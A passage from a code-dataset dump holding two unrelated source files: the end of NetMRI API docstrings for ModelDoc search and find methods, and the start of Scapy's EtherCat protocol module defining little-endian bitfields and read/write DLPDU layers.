"""Lists the available model docs matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param category: The category of this model.
:type category: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param category: The category of this model.
:type category: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param created_at: The date and time the record was initially created in NetMRI.
:type created_at: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param created_at: The date and time the record was initially created in NetMRI.
:type created_at: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param description: The description of this model.
:type description: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param description: The description of this model.
:type description: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param hidden_ind: A flag indicating if model is hidden
:type hidden_ind: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param hidden_ind: A flag indicating if model is hidden
:type hidden_ind: Array of Boolean
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param history_support: History support.
:type history_support: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param history_support: History support.
:type history_support: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param id: The internal NetMRI identifier for this model.
:type id: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param id: The internal NetMRI identifier for this model.
:type id: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param java_api_ind: A flag indicating if model is in java API
:type java_api_ind: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param java_api_ind: A flag indicating if model is in java API
:type java_api_ind: Array of Boolean
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param model_name: The name of model.
:type model_name: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param model_name: The name of model.
:type model_name: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param perl_api_ind: A flag indicating if model is in perl API
:type perl_api_ind: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param perl_api_ind: A flag indicating if model is in perl API
:type perl_api_ind: Array of Boolean
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param table_name: The name of database table where model records are stored.
:type table_name: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param table_name: The name of database table where model records are stored.
:type table_name: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param title: The title of model.
:type title: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param title: The title of model.
:type title: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param updated_at: The date and time the record was last modified in NetMRI.
:type updated_at: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param updated_at: The date and time the record was last modified in NetMRI.
:type updated_at: Array of DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` id
:param sort: The data field(s) to use for sorting the output. Default is id. Valid values are id, title, model_name, table_name, category, description, history_support, perl_api_ind, java_api_ind, created_at, updated_at, hidden_ind.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each ModelDoc. Valid values are id, title, model_name, table_name, category, description, history_support, perl_api_ind, java_api_ind, created_at, updated_at, hidden_ind. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: This value will be matched against model docs, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: category, created_at, description, hidden_ind, history_support, id, java_api_ind, model_name, perl_api_ind, table_name, title, updated_at.
:type query: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return model_docs: An array of the ModelDoc objects that match the specified input criteria.
:rtype model_docs: Array of ModelDoc
"""
return self.api_list_request(self._get_method_fullname("search"), kwargs)
def find(self, **kwargs):
"""Lists the available model docs matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: category, created_at, description, hidden_ind, history_support, id, java_api_ind, model_name, perl_api_ind, table_name, title, updated_at.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_category: The operator to apply to the field category. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. category: The category of this model. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_category: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_category: If op_category is specified, the field named in this input will be compared to the value in category using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_category must be specified if op_category is specified.
:type val_f_category: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_category: If op_category is specified, this value will be compared to the value in category using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_category must be specified if op_category is specified.
:type val_c_category: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_created_at: The operator to apply to the field created_at. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. created_at: The date and time the record was initially created in NetMRI. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_created_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_created_at: If op_created_at is specified, the field named in this input will be compared to the value in created_at using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_created_at must be specified if op_created_at is specified.
:type val_f_created_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_created_at: If op_created_at is specified, this value will be compared to the value in created_at using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_created_at must be specified if op_created_at is specified.
:type val_c_created_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_description: The operator to apply to the field description. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. description: The description of this model. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_description: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_description: If op_description is specified, the field named in this input will be compared to the value in description using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_description must be specified if op_description is specified.
:type val_f_description: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_description: If op_description is specified, this value will be compared to the value in description using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_description must be specified if op_description is specified.
:type val_c_description: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_hidden_ind: The operator to apply to the field hidden_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. hidden_ind: A flag indicating if model is hidden For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_hidden_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_hidden_ind: If op_hidden_ind is specified, the field named in this input will be compared to the value in hidden_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_hidden_ind must be specified if op_hidden_ind is specified.
:type val_f_hidden_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_hidden_ind: If op_hidden_ind is specified, this value will be compared to the value in hidden_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_hidden_ind must be specified if op_hidden_ind is specified.
:type val_c_hidden_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_history_support: The operator to apply to the field history_support. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. history_support: History support. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_history_support: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_history_support: If op_history_support is specified, the field named in this input will be compared to the value in history_support using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_history_support must be specified if op_history_support is specified.
:type val_f_history_support: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_history_support: If op_history_support is specified, this value will be compared to the value in history_support using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_history_support must be specified if op_history_support is specified.
:type val_c_history_support: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_id: The operator to apply to the field id. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. id: The internal NetMRI identifier for this model. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_id: If op_id is specified, the field named in this input will be compared to the value in id using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_id must be specified if op_id is specified.
:type val_f_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_id: If op_id is specified, this value will be compared to the value in id using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_id must be specified if op_id is specified.
:type val_c_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_java_api_ind: The operator to apply to the field java_api_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. java_api_ind: A flag indicating if model is in java API For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_java_api_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_java_api_ind: If op_java_api_ind is specified, the field named in this input will be compared to the value in java_api_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_java_api_ind must be specified if op_java_api_ind is specified.
:type val_f_java_api_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_java_api_ind: If op_java_api_ind is specified, this value will be compared to the value in java_api_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_java_api_ind must be specified if op_java_api_ind is specified.
:type val_c_java_api_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_model_name: The operator to apply to the field model_name. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. model_name: The name of model. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_model_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_model_name: If op_model_name is specified, the field named in this input will be compared to the value in model_name using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_model_name must be specified if op_model_name is specified.
:type val_f_model_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_model_name: If op_model_name is specified, this value will be compared to the value in model_name using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_model_name must be specified if op_model_name is specified.
:type val_c_model_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_perl_api_ind: The operator to apply to the field perl_api_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. perl_api_ind: A flag indicating if model is in perl API For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_perl_api_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_perl_api_ind: If op_perl_api_ind is specified, the field named in this input will be compared to the value in perl_api_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_perl_api_ind must be specified if op_perl_api_ind is specified.
:type val_f_perl_api_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_perl_api_ind: If op_perl_api_ind is specified, this value will be compared to the value in perl_api_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_perl_api_ind must be specified if op_perl_api_ind is specified.
:type val_c_perl_api_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_table_name: The operator to apply to the field table_name. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. table_name: The name of database table where model records are stored. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_table_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_table_name: If op_table_name is specified, the field named in this input will be compared to the value in table_name using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_table_name must be specified if op_table_name is specified.
:type val_f_table_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_table_name: If op_table_name is specified, this value will be compared to the value in table_name using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_table_name must be specified if op_table_name is specified.
:type val_c_table_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_title: The operator to apply to the field title. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. title: The title of model. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_title: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_title: If op_title is specified, the field named in this input will be compared to the value in title using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_title must be specified if op_title is specified.
:type val_f_title: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_title: If op_title is specified, this value will be compared to the value in title using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_title must be specified if op_title is specified.
:type val_c_title: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_updated_at: The operator to apply to the field updated_at. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. updated_at: The date and time the record was last modified in NetMRI. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_updated_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_updated_at: If op_updated_at is specified, the field named in this input will be compared to the value in updated_at using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_updated_at must be specified if op_updated_at is specified.
:type val_f_updated_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_updated_at: If op_updated_at is specified, this value will be compared to the value in updated_at using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_updated_at must be specified if op_updated_at is specified.
:type val_c_updated_at: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` id
:param sort: The data field(s) to use for sorting the output. Default is id. Valid values are id, title, model_name, table_name, category, description, history_support, perl_api_ind, java_api_ind, created_at, updated_at, hidden_ind.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each ModelDoc. Valid values are id, title, model_name, table_name, category, description, history_support, perl_api_ind, java_api_ind, created_at, updated_at, hidden_ind. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return model_docs: An array of the ModelDoc objects that match the specified input criteria.
:rtype model_docs: Array of ModelDoc
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs) | unknown | codeparrot/codeparrot-clean | ||
# scapy.contrib.description = EtherCat
# scapy.contrib.status = loads
"""
EtherCat automation protocol
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:author: Thomas Tannhaeuser, hecke@naberius.de
:license: GPLv2
This module is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This module is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
:description:
This module provides Scapy layers for the EtherCat protocol.
normative references:
- IEC 61158-3-12 - data link service and topology description
- IEC 61158-4-12 - protocol specification
Currently only read/write services as defined in IEC 61158-4-12,
sec. 5.4 are supported.
:TODO:
- Mailbox service (sec. 5.5)
- Network variable service (sec. 5.6)
:NOTES:
- EtherCat frame type defaults to TYPE-12-PDU (0x01) using xxx bytes
of padding
- padding for minimum frame size is added automatically
"""
import struct
from scapy.compat import raw
from scapy.error import log_runtime, Scapy_Exception
from scapy.fields import BitField, ByteField, LEShortField, FieldListField, \
LEIntField, FieldLenField, _EnumField, EnumField
from scapy.layers.l2 import Ether, Dot1Q
import scapy.modules.six as six
from scapy.packet import bind_layers, Packet, Padding
'''
EtherCat uses some little endian bitfields without alignment to any common boundaries. # noqa: E501
See https://github.com/secdev/scapy/pull/569#issuecomment-295419176 for a short explanation # noqa: E501
why the following field definitions are necessary.
'''
class LEBitFieldSequenceException(Scapy_Exception):
"""
thrown by EtherCat structure tests
"""
pass
class LEBitField(BitField):
"""
a little endian version of the BitField
"""
def _check_field_type(self, pkt, index):
"""
check if the field addressed by given index relative to this field
shares type of this field so we can catch a mix of LEBitField
and BitField/other types
"""
my_idx = pkt.fields_desc.index(self)
try:
next_field = pkt.fields_desc[my_idx + index]
if type(next_field) is not LEBitField and \
next_field.__class__.__base__ is not LEBitField:
raise LEBitFieldSequenceException('field after field {} must '
'be of type LEBitField or '
'derived classes'.format(self.name)) # noqa: E501
except IndexError:
# no more fields -> error
raise LEBitFieldSequenceException('Missing further LEBitField '
'based fields after field '
'{} '.format(self.name))
def addfield(self, pkt, s, val):
"""
:param pkt: packet instance the raw string s and field belongs to
:param s: raw string representing the frame
:param val: value
:return: final raw string, tuple (s, bitsdone, data) if in between bit field # noqa: E501
as we don't know the final size of the full bitfield we need to accumulate the data. # noqa: E501
if we reach a field that ends at a octet boundary, we build the whole string # noqa: E501
"""
if type(s) is tuple and len(s) == 4:
s, bitsdone, data, _ = s
self._check_field_type(pkt, -1)
else:
# this is the first bit field in the set
bitsdone = 0
data = []
bitsdone += self.size
data.append((self.size, self.i2m(pkt, val)))
if bitsdone % 8:
# somewhere in between bit 0 .. 7 - next field should add more bits... # noqa: E501
self._check_field_type(pkt, 1)
return s, bitsdone, data, type(LEBitField)
else:
data.reverse()
octet = 0
remaining_len = 8
octets = bytearray()
for size, val in data:
while True:
if size < remaining_len:
remaining_len = remaining_len - size
octet |= val << remaining_len
break
elif size > remaining_len:
# take the leading bits and add them to octet
size -= remaining_len
octet |= val >> size
octets = struct.pack('!B', octet) + octets
octet = 0
remaining_len = 8
# delete all consumed bits
# TODO: do we need to add a check for bitfields > 64 bits to catch overruns here? # noqa: E501
val &= ((2 ** size) - 1)
continue
else:
# size == remaining len
octet |= val
octets = struct.pack('!B', octet) + octets
octet = 0
remaining_len = 8
break
return s + octets
def getfield(self, pkt, s):
"""
extract data from raw str
collect all instances belonging to the bit field set.
if we reach a field that ends at a octet boundary, dissect the whole bit field at once # noqa: E501
:param pkt: packet instance the field belongs to
:param s: raw string representing the frame -or- tuple containing raw str, number of bits and array of fields # noqa: E501
:return: tuple containing raw str, number of bits and array of fields -or- remaining raw str and value of this # noqa: E501
"""
if type(s) is tuple and len(s) == 3:
s, bits_in_set, fields = s
else:
bits_in_set = 0
fields = []
bits_in_set += self.size
fields.append(self)
if bits_in_set % 8:
# we are in between the bitfield
return (s, bits_in_set, fields), None
else:
cur_val = 0
cur_val_bit_idx = 0
this_val = 0
field_idx = 0
field = fields[field_idx]
field_required_bits = field.size
idx = 0
s = bytearray(s)
bf_total_byte_length = bits_in_set // 8
for octet in s[0:bf_total_byte_length]:
idx += 1
octet_bits_left = 8
while octet_bits_left:
if field_required_bits == octet_bits_left:
# whole field fits into remaining bits
# as this also signals byte-alignment this should exit the inner and outer loop # noqa: E501
cur_val |= octet << cur_val_bit_idx
pkt.fields[field.name] = cur_val
'''
TODO: check if do_dessect() needs a non-None check for assignment to raw_packet_cache_fields # noqa: E501
setfieldval() is evil as it sets raw_packet_cache_fields to None - but this attribute # noqa: E501
is accessed in do_dissect() without checking for None... exception is caught and the # noqa: E501
user ends up with a layer decoded as raw...
pkt.setfieldval(field.name, int(bit_str[:field.size], 2)) # noqa: E501
'''
octet_bits_left = 0
this_val = cur_val
elif field_required_bits < octet_bits_left:
# pick required bits
cur_val |= (octet & ((2 ** field_required_bits) - 1)) << cur_val_bit_idx # noqa: E501
pkt.fields[field.name] = cur_val
# remove consumed bits
octet >>= field_required_bits
octet_bits_left -= field_required_bits
# and move to the next field
field_idx += 1
field = fields[field_idx]
field_required_bits = field.size
cur_val_bit_idx = 0
cur_val = 0
elif field_required_bits > octet_bits_left:
# take remaining bits
cur_val |= octet << cur_val_bit_idx
cur_val_bit_idx += octet_bits_left
field_required_bits -= octet_bits_left
octet_bits_left = 0
return s[bf_total_byte_length:], this_val
class LEBitFieldLenField(LEBitField):
__slots__ = ["length_of", "count_of", "adjust"]
def __init__(self, name, default, size, length_of=None, count_of=None, adjust=lambda pkt, x: x): # noqa: E501
LEBitField.__init__(self, name, default, size)
self.length_of = length_of
self.count_of = count_of
self.adjust = adjust
def i2m(self, pkt, x):
return (FieldLenField.i2m.__func__ if six.PY2 else FieldLenField.i2m)(self, pkt, x) # noqa: E501
class LEBitEnumField(LEBitField, _EnumField):
__slots__ = EnumField.__slots__
def __init__(self, name, default, size, enum):
_EnumField.__init__(self, name, default, enum)
self.rev = size < 0
self.size = abs(size)
################################################
# DLPDU structure definitions (read/write PDUs)
################################################
ETHERCAT_TYPE_12_CIRCULATING_FRAME = {
0x00: 'FRAME-NOT-CIRCULATING',
0x01: 'FRAME-CIRCULATED-ONCE'
}
ETHERCAT_TYPE_12_NEXT_FRAME = {
0x00: 'LAST-TYPE12-PDU',
0x01: 'TYPE12-PDU-FOLLOWS'
}
class EtherCatType12DLPDU(Packet):
"""
Type12 message base class
"""
def post_build(self, pkt, pay):
"""
set next attr automatically if not set explicitly by user
:param pkt: raw string containing the current layer
:param pay: raw string containing the payload
:return: <new current layer> + payload
"""
data_len = len(self.data)
if data_len > 2047:
raise ValueError('payload size {} exceeds maximum length {} '
'of data size.'.format(data_len, 2047))
if self.next is not None:
has_next = True if self.next else False
else:
if pay:
has_next = True
else:
has_next = False
if has_next:
next_flag = bytearray([pkt[7] | 0b10000000])
else:
next_flag = bytearray([pkt[7] & 0b01111111])
return pkt[:7] + next_flag + pkt[8:] + pay
def guess_payload_class(self, payload):
try:
dlpdu_type = payload[0]
return EtherCat.ETHERCAT_TYPE12_DLPDU_TYPES[dlpdu_type]
except KeyError:
log_runtime.error(
'{}.guess_payload_class() - unknown or invalid '
'DLPDU type'.format(self.__class__.__name__))
return Packet.guess_payload_class(self, payload)
# structure templates lacking leading cmd-attribute
PHYSICAL_ADDRESSING_DESC = [
ByteField('idx', 0),
LEShortField('adp', 0),
LEShortField('ado', 0),
LEBitFieldLenField('len', None, 11, count_of='data'),
LEBitField('_reserved', 0, 3),
LEBitEnumField('c', 0, 1, ETHERCAT_TYPE_12_CIRCULATING_FRAME),
LEBitEnumField('next', None, 1, ETHERCAT_TYPE_12_NEXT_FRAME),
LEShortField('irq', 0),
FieldListField('data', [], ByteField('', 0x00),
count_from=lambda pkt: pkt.len),
LEShortField('wkc', 0)
]
BROADCAST_ADDRESSING_DESC = PHYSICAL_ADDRESSING_DESC
LOGICAL_ADDRESSING_DESC = [
ByteField('idx', 0),
LEIntField('adr', 0),
LEBitFieldLenField('len', None, 11, count_of='data'),
LEBitField('_reserved', 0, 3),
LEBitEnumField('c', 0, 1, ETHERCAT_TYPE_12_CIRCULATING_FRAME),
LEBitEnumField('next', None, 1, ETHERCAT_TYPE_12_NEXT_FRAME),
LEShortField('irq', 0),
FieldListField('data', [], ByteField('', 0x00),
count_from=lambda pkt: pkt.len),
LEShortField('wkc', 0)
]
################
# read messages
################
class EtherCatAPRD(EtherCatType12DLPDU):
"""
APRD - Auto Increment Physical Read
(IEC 61158-5-12, sec. 5.4.1.2 tab. 14 / p. 32)
"""
fields_desc = [ByteField('_cmd', 0x01)] + \
EtherCatType12DLPDU.PHYSICAL_ADDRESSING_DESC
class EtherCatFPRD(EtherCatType12DLPDU):
"""
FPRD - Configured address physical read
(IEC 61158-5-12, sec. 5.4.1.3 tab. 15 / p. 33)
"""
fields_desc = [ByteField('_cmd', 0x04)] + \
EtherCatType12DLPDU.PHYSICAL_ADDRESSING_DESC
class EtherCatBRD(EtherCatType12DLPDU):
"""
BRD - Broadcast read
(IEC 61158-5-12, sec. 5.4.1.4 tab. 16 / p. 34)
"""
fields_desc = [ByteField('_cmd', 0x07)] + \
EtherCatType12DLPDU.BROADCAST_ADDRESSING_DESC
class EtherCatLRD(EtherCatType12DLPDU):
"""
LRD - Logical read
(IEC 61158-5-12, sec. 5.4.1.5 tab. 17 / p. 36)
"""
fields_desc = [ByteField('_cmd', 0x0a)] + \
EtherCatType12DLPDU.LOGICAL_ADDRESSING_DESC
#################
# write messages
#################
class EtherCatAPWR(EtherCatType12DLPDU):
"""
APWR - Auto Increment Physical Write
(IEC 61158-5-12, sec. 5.4.2.2 tab. 18 / p. 37)
"""
fields_desc = [ByteField('_cmd', 0x02)] + \
EtherCatType12DLPDU.PHYSICAL_ADDRESSING_DESC
class EtherCatFPWR(EtherCatType12DLPDU):
"""
FPWR - Configured address physical write
(IEC 61158-5-12, sec. 5.4.2.3 tab. 19 / p. 38)
"""
fields_desc = [ByteField('_cmd', 0x05)] + \
EtherCatType12DLPDU.PHYSICAL_ADDRESSING_DESC
class EtherCatBWR(EtherCatType12DLPDU):
"""
